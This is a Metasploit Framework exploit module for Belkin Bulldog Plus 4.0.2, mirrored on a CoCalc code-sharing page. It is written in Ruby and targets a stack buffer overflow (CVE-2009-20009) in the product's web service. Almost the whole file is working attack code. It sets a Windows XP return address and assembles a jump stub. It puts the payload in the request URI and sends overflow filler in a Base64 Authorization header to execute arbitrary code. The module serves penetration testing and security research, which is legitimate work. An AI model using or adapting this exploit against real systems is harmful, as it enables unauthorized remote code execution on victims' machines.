Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/belkin_bulldog.rb
33181 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Belkin Bulldog Plus

18
          4.0.2 build 1219. When sending a specially crafted http request,

19
          an attacker may be able to execute arbitrary code.

20
        },

21
        'Author' => [ 'MC' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2009-20009' ],

25
          [ 'OSVDB', '54395' ],

26
          [ 'BID', '34033' ],

27
          [ 'EDB', '8173' ]

28
        ],

29
        'Privileged' => true,

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'process',

32
          'AllowWin32SEH' => true

33
        },

34
        'Payload' => {

35
          'Space' => 750,

36
          'BadChars' => "\x00",

37
          'StackAdjustment' => -3500,

38
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

39
          'DisableNops' => true,

40
        },

41
        'Platform' => 'win',

42
        'Targets' => [

43
          [ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ],

44
        ],

45
        'DefaultTarget' => 0,

46
        'DisclosureDate' => '2009-03-08',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54
  end

55


56
  def exploit

57
    c = connect

58


59
    dwerd = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call dword [esp+58h]").encode_string

60


61
    filler = [target.ret].pack('V') + dwerd + make_nops(28)

62


63
    print_status("Trying target #{target.name}...")

64


65
    send_request_raw({

66
      'uri' => payload.encoded,

67
      'version' => '1.1',

68
      'method' => 'GET',

69
      'headers' =>

70
      {

71
        'Authorization' => "Basic #{Rex::Text.encode_base64(filler)}"

72
      }

73
    }, 5)

74


75
    handler

76
  end

77
end

78


79